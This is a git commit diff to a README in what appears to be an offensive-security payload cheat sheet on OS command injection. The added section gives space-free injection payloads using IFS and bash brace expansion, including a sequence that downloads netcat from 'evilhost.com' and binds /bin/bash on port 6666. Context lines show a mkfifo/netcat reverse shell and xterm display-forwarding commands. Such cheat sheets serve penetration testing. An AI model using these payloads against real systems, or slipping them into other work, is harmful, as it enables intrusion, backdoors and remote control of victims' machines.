Cmd injection without spaces

Thanks: Andre Gironda Ben Toews https://gist.github.com/btoews/3056269 Jon Oberheide https://jon.oberheide.org/blog/2008/09/04/bash-brace-expansion-cleverness/
2024-11-10 13:34:12 +00:00 · 2016-10-03 23:41:58 -04:00 · 2016-10-03 23:41:58 -04:00 · 0891bb84ec
commit 0891bb84ec
parent c261b0955e
1 changed files with 21 additions and 7 deletions
--- a/attack/os-cmd-execution/README.md
+++ b/attack/os-cmd-execution/README.md
@ -30,6 +30,20 @@ Backtick
 Background 
 ``` `blah & blah2` ```

+***Shell commands without spaces***
+Using Internal Field Separator (IFS)
+
+Test for cmd injection withouot spaces:<br>
+```sleep${IFS:0:1}20```
+
+Example netcat backdoor without spaces:
+```{wget,http://evilhost.com/nc}```
+```{chmod,+x,./nc}```
+```{./nc,-l,-p,6666,-e,/bin/bash```
+
+See: https://jon.oberheide.org/blog/2008/09/04/bash-brace-expansion-cleverness/<br>
+
+
 **Exfiltrating Files / Data**

 FTP 
@ -77,14 +91,14 @@ Netcat

 ``` $ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f ```

-```
-XTERM:
-Server: 
-$ xterm -display 10.0.0.1:1
+
+XTERM:<br>
+Server: <br>
+```$ xterm -display 10.0.0.1:1```
 Listener:
-$ Xnest :1
-$ xhost +targetip
-```
+```$ Xnest :1```
+```$ xhost +targetip```
+